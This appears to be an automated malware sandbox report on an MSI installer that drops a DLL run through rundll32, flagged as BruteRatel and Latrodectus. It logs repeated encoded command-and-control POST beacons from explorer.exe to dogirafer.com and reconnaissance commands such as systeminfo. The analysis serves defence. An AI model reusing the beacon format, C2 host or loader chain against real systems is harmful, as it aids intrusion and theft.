                                                                                                                                                                              2024-12-03 16:46:55 UTC343INData Raw: 31 35 30 0d 0a 50 53 69 64 54 63 65 78 32 49 70 6e 61 68 6e 64 67 6d 37 6c 67 33 64 4b 50 6b 2f 58 44 53 58 43 5a 76 75 78 76 53 48 4b 59 57 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 71 49 6b 34 71 65 4a 50 6b 37 46 6b 71 44 72 65 32 73 71 64 47 74 35 4b 72 6f 38 73 34 67 69 4e 63 47 6d 4a 4f 36 6f 2b 64 43 7a 5a 79 61 6d 34 44 44 55 58 69 70 59 53 4e 44 32 6a 45 71 79 6f 62 4d 49 77 4e 35 62 67 76 31 6b 37 33 39 76 79 5a 48 54 41 77 74 67 37 2b 4a 42 7a 4c 47 73 77 77 44 65 72 6c 54 68 6f 52 61 37 37 49 66 48 4e 68 34 6f 4e 47 36 56 58 59 43 6e 5a 46 67 45 77 36 4e 46 30 4a 63 72 47 36 4a 66 6e 6c 63 6e 6a 42 4e 6d 71 74 55 58 33 56 4e 78 52 58 4e 43 33 74 31 78 74 79 54 62 51 43 79 38 4b 5a 6e 4f 39 59 49 74 47 65 35 50 48 5a 4f 50 52 57 52 5a
                                                                                                                                                                              Data Ascii: 150PSidTcex2Ipnahndgm7lg3dKPk/XDSXCZvuxvSHKYWmcphSGpB6yiJiVjA1qIk4qeJPk7FkqDre2sqdGt5Kro8s4giNcGmJO6o+dCzZyam4DDUXipYSND2jEqyobMIwN5bgv1k739vyZHTAwtg7+JBzLGswwDerlThoRa77IfHNh4oNG6VXYCnZFgEw6NF0JcrG6JfnlcnjBNmqtUX3VNxRXNC3t1xtyTbQCy8KZnO9YItGe5PHZOPRWRZ
                                                                                                                                                                              2024-12-03 16:46:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              39192.168.2.450046104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:46:56 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hlZQqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:46:58 UTC787INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:46:58 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ul2jivbW43RrWWmPt%2FZ9YHDn9zG5jrZCnTU7lev5zZpCXfW2jK%2BlPbqyYiK2Poi5Ia%2BTvO6YzHKJcrJFzDZqLHuhhRq67K%2FlprWtXRFMSYdJWzNPTcuNIL9PH%2B9s4Xgo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec50927ceb443b9-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1804&min_rtt=1804&rtt_var=678&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1613259&cwnd=192&unsent_bytes=0&cid=32eb356067a838e1&ts=1676&x=0"
                                                                                                                                                                              2024-12-03 16:46:58 UTC339INData Raw: 31 34 63 0d 0a 4f 43 32 66 54 4d 62 63 30 4f 46 76 59 42 58 51 79 57 2f 6d 79 6e 4e 4b 50 45 6d 34 42 79 4b 6b 61 50 2b 33 76 47 72 78 58 31 62 64 36 52 61 59 74 41 32 73 30 4d 44 71 74 7a 5a 72 49 55 55 70 46 5a 72 6c 67 46 34 68 44 62 58 7a 73 4b 49 44 73 5a 65 74 70 61 63 38 36 79 5a 58 46 47 4e 49 6f 2f 36 61 56 44 46 73 64 55 46 50 51 56 48 2b 70 59 43 4f 52 6e 33 45 39 6a 30 66 4a 5a 30 4b 34 71 38 38 32 67 32 36 2b 76 37 62 52 69 45 6d 73 56 58 63 49 79 48 47 45 38 77 77 41 34 58 71 49 42 30 5a 62 37 50 48 4e 6e 4d 6c 35 49 35 48 36 31 61 79 43 52 42 47 67 45 67 31 4e 78 63 31 42 4f 6e 69 50 50 6a 56 45 48 69 59 50 6e 61 70 56 6a 65 4a 49 6c 38 58 4e 79 76 34 33 77 39 32 57 66 38 54 69 73 7a 5a 68 61 56 66 4d 34 33 6e 77 63 33 6b 4f 2f 35 56 54 70
                                                                                                                                                                              Data Ascii: 14cOC2fTMbc0OFvYBXQyW/mynNKPEm4ByKkaP+3vGrxX1bd6RaYtA2s0MDqtzZrIUUpFZrlgF4hDbXzsKIDsZetpac86yZXFGNIo/6aVDFsdUFPQVH+pYCORn3E9j0fJZ0K4q882g26+v7bRiEmsVXcIyHGE8wwA4XqIB0Zb7PHNnMl5I5H61ayCRBGgEg1Nxc1BOniPPjVEHiYPnapVjeJIl8XNyv43w92Wf8TiszZhaVfM43nwc3kO/5VTp
                                                                                                                                                                              2024-12-03 16:46:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              40192.168.2.450047104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:47:00 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hlZAqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:47:01 UTC789INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:47:01 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iXD%2FL2IKRoz3rQIBmwWZF%2FBuBTfyn%2BKElbZdJi50QcFGqQF%2BQ8JXTsF%2B1eqAbhrESZ8as8NclaS%2BpIKJpXjTAxZ2ClDPNIUxxEHANRA6hG0NAJ3ncVdwCC1iN7rnHHR4"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec5093acc5a4229-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2347&min_rtt=2345&rtt_var=884&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1048&delivery_rate=1235717&cwnd=236&unsent_bytes=0&cid=5561797bb78f436c&ts=1661&x=0"
                                                                                                                                                                              2024-12-03 16:47:01 UTC347INData Raw: 31 35 34 0d 0a 50 69 79 61 52 4d 53 79 30 49 70 6a 61 68 6e 51 68 57 48 6a 67 33 39 4c 4f 55 6e 57 42 53 44 43 61 76 79 79 76 53 54 49 59 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6d 49 6b 38 70 66 4a 66 6a 37 46 63 67 44 62 4b 37 74 71 52 47 73 4a 57 6e 70 4d 77 32 35 55 35 54 46 57 56 46 36 4d 57 67 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 6f 30 42 4f 6a 72 4a 78 68 2b 5a 4c 44 45 63 33 63 71 37 73 74 45 36 31 54 61 44 78 74 48 37 45 34 34 4e 6c 30 42 50 6f 6e 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 53 51 35
                                                                                                                                                                              Data Ascii: 154PiyaRMSy0IpjahnQhWHjg39LOUnWBSDCavyyvSTIYGmcphSGpB6yiJiVjA1mIk8pfJfj7FcgDbK7tqRGsJWnpMw25U5TFWVF6MWgfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kco0BOjrJxh+ZLDEc3cq7stE61TaDxtH7E44Nl0BPonMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1SQ5
                                                                                                                                                                              2024-12-03 16:47:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              41192.168.2.450048104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:47:03 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hlawqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:47:04 UTC783INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:47:04 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hZkOcdlk1L%2FWdc0IAcD0oZWW5i3ruMa2Ix11GjATEI9Ed%2FtdUZLrEvVqVniHdS25FyB7Flq6m85idgInuq48XrLMnY19IbbFnVlhb38TjGXa9YIj4SUwrs9MVsgOTj%2Fm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec5094dd9de434b-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1642&min_rtt=1636&rtt_var=627&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1726788&cwnd=243&unsent_bytes=0&cid=72948ea31d64db2c&ts=1397&x=0"
                                                                                                                                                                              2024-12-03 16:47:04 UTC343INData Raw: 31 35 30 0d 0a 50 79 32 56 51 73 57 30 33 49 70 69 59 68 37 62 68 6d 48 67 67 33 4a 49 4f 30 37 54 42 79 62 43 62 50 75 31 75 53 62 4a 5a 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 70 49 45 51 70 63 70 58 6c 37 46 67 6e 43 37 71 2f 75 61 6c 47 75 35 75 72 72 63 6b 39 35 55 35 57 47 32 42 50 36 38 61 6f 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 34 35 42 2b 72 72 4a 68 35 2b 61 62 4c 49 65 6e 6b 6b 37 73 74 43 35 6c 62 55 41 42 78 45 37 45 34 34 4f 56 34 4c 4f 59 37 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 57 51 70
                                                                                                                                                                              Data Ascii: 150Py2VQsW03IpiYh7bhmHgg3JIO07TBybCbPu1uSbJZGmcphSGpB6yiJiVjA1pIEQpcpXl7FgnC7q/ualGu5urrck95U5WG2BP68aofW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/Kc45B+rrJh5+abLIenkk7stC5lbUABxE7E44OV4LOY7MfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1WQp
                                                                                                                                                                              2024-12-03 16:47:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              42192.168.2.450049104.21.68.894432580C:\Windows\explorer.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-12-03 16:47:05 UTC410OUTPOST /test/ HTTP/1.1
                                                                                                                                                                              Accept: */*
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Cookie: aXLYGobmm+hlagqczCa1wndZbQ+OUCykGorGviDPYCHUnWKM12il6/zrxDJoIzJZfJOUlQFhBbSp4ONZ656uso19uGMKTT4Y4pn/bwZTAFoNUkz67MPOTGTcsGxGZcpO8bgvihL3rbWBQnlm4x64W3ORV5FvWue3fktILuaWLzMztNgb
                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                                                              Host: dogirafer.com
                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                              2024-12-03 16:47:07 UTC785INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Tue, 03 Dec 2024 16:47:07 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2ohoS9oIvL6r%2FuA1Bz5F5D9DVQgcyoQK%2F%2BIyHB5Us5zOFhlE1s5pQT5pxnK8%2BUjvflSuyrsnr9NcefauZXMR2Qp8aunox521DyhGDFFiaef4gJVO6OM52RVjWId2UYGf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8ec509603d5143d5-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1769&rtt_var=679&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1048&delivery_rate=1593016&cwnd=240&unsent_bytes=0&cid=b0c34d83a8cfd11a&ts=1624&x=0"
                                                                                                                                                                              2024-12-03 16:47:07 UTC347INData Raw: 31 35 34 0d 0a 4f 53 69 59 51 4d 61 32 32 49 70 67 5a 68 6e 63 68 57 48 6f 67 33 35 50 4f 6b 72 51 41 43 48 43 62 76 65 78 76 79 62 4d 5a 47 6d 63 70 68 53 47 70 42 36 79 69 4a 69 56 6a 41 31 6d 4a 45 4d 75 63 70 50 6b 37 46 63 6d 44 62 71 2b 74 61 68 47 75 70 43 6f 6f 38 45 37 37 55 35 58 47 32 70 4e 35 38 4f 6e 66 57 34 71 63 32 38 7a 62 6b 57 36 72 5a 69 4a 43 43 4b 59 76 6e 64 52 49 35 30 4a 38 37 67 2f 30 6c 47 34 2b 4c 32 58 58 53 6c 36 73 52 2b 69 58 54 6e 2f 4b 63 77 78 41 65 37 72 49 42 68 2b 61 72 4c 48 66 6e 51 70 37 38 74 45 35 31 4c 65 44 78 35 44 37 45 73 31 4e 6c 34 49 4f 59 72 4d 66 61 48 38 63 30 69 6a 4e 6a 4f 6c 54 58 6e 53 66 55 68 43 66 32 33 75 30 51 35 36 57 62 41 57 67 4e 50 59 6b 71 39 42 61 4e 61 50 75 49 6a 38 41 73 31 51 51 35
                                                                                                                                                                              Data Ascii: 154OSiYQMa22IpgZhnchWHog35POkrQACHCbvexvybMZGmcphSGpB6yiJiVjA1mJEMucpPk7FcmDbq+tahGupCoo8E77U5XG2pN58OnfW4qc28zbkW6rZiJCCKYvndRI50J87g/0lG4+L2XXSl6sR+iXTn/KcwxAe7rIBh+arLHfnQp78tE51LeDx5D7Es1Nl4IOYrMfaH8c0ijNjOlTXnSfUhCf23u0Q56WbAWgNPYkq9BaNaPuIj8As1QQ5
                                                                                                                                                                              2024-12-03 16:47:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                              Click to jump to process

                                                                                                                                                                              Target ID:0
                                                                                                                                                                              Start time:11:42:59
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\fes.msi"
                                                                                                                                                                              Imagebase:0x7ff783690000
                                                                                                                                                                              File size:69'632 bytes
                                                                                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:1
                                                                                                                                                                              Start time:11:42:59
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                              Imagebase:0x7ff783690000
                                                                                                                                                                              File size:69'632 bytes
                                                                                                                                                                              MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:2
                                                                                                                                                                              Start time:11:42:59
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 499D87EFF8C8F588A32BFEB435A5201B
                                                                                                                                                                              Imagebase:0x360000
                                                                                                                                                                              File size:59'904 bytes
                                                                                                                                                                              MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:3
                                                                                                                                                                              Start time:11:43:00
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\Installer\MSI17D3.tmp
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Windows\Installer\MSI17D3.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\avutil.dll, DLLMain
                                                                                                                                                                              Imagebase:0xcb0000
                                                                                                                                                                              File size:399'328 bytes
                                                                                                                                                                              MD5 hash:B9545ED17695A32FACE8C3408A6A3553
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:4
                                                                                                                                                                              Start time:11:43:00
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain
                                                                                                                                                                              Imagebase:0xd20000
                                                                                                                                                                              File size:61'440 bytes
                                                                                                                                                                              MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:5
                                                                                                                                                                              Start time:11:43:00
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\avutil.dll, DLLMain
                                                                                                                                                                              Imagebase:0x7ff673020000
                                                                                                                                                                              File size:71'680 bytes
                                                                                                                                                                              MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000005.00000003.2823468675.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000005.00000003.2823307275.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000005.00000003.1919345922.000001E51D085000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_BruteRatel_1, Description: Yara detected BruteRatel, Source: 00000005.00000002.4141158202.000001E5177F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:9
                                                                                                                                                                              Start time:11:43:24
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                                                                                              Imagebase:0x7ff72b770000
                                                                                                                                                                              File size:5'141'208 bytes
                                                                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Yara matches:
                                                                                                                                                                              • Rule: JoeSecurity_Latrodectus, Description: Yara detected Latrodectus, Source: 00000009.00000002.4152487268.000000000B3AA000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:false

                                                                                                                                                                              Target ID:11
                                                                                                                                                                              Start time:11:45:02
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:/c ipconfig /all
                                                                                                                                                                              Imagebase:0x7ff693270000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:12
                                                                                                                                                                              Start time:11:45:02
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:high
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:13
                                                                                                                                                                              Start time:11:45:02
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\ipconfig.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:ipconfig /all
                                                                                                                                                                              Imagebase:0x7ff6e7b30000
                                                                                                                                                                              File size:35'840 bytes
                                                                                                                                                                              MD5 hash:62F170FB07FDBB79CEB7147101406EB8
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:14
                                                                                                                                                                              Start time:11:45:02
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:/c systeminfo
                                                                                                                                                                              Imagebase:0x7ff693270000
                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:15
                                                                                                                                                                              Start time:11:45:02
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:16
                                                                                                                                                                              Start time:11:45:02
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:systeminfo
                                                                                                                                                                              Imagebase:0x7ff7d3060000
                                                                                                                                                                              File size:110'080 bytes
                                                                                                                                                                              MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Target ID:17
                                                                                                                                                                              Start time:11:45:03
                                                                                                                                                                              Start date:03/12/2024
                                                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                              Imagebase:0x7ff693ab0000
                                                                                                                                                                              File size:496'640 bytes
                                                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                              Programmed in:C, C++ or other language
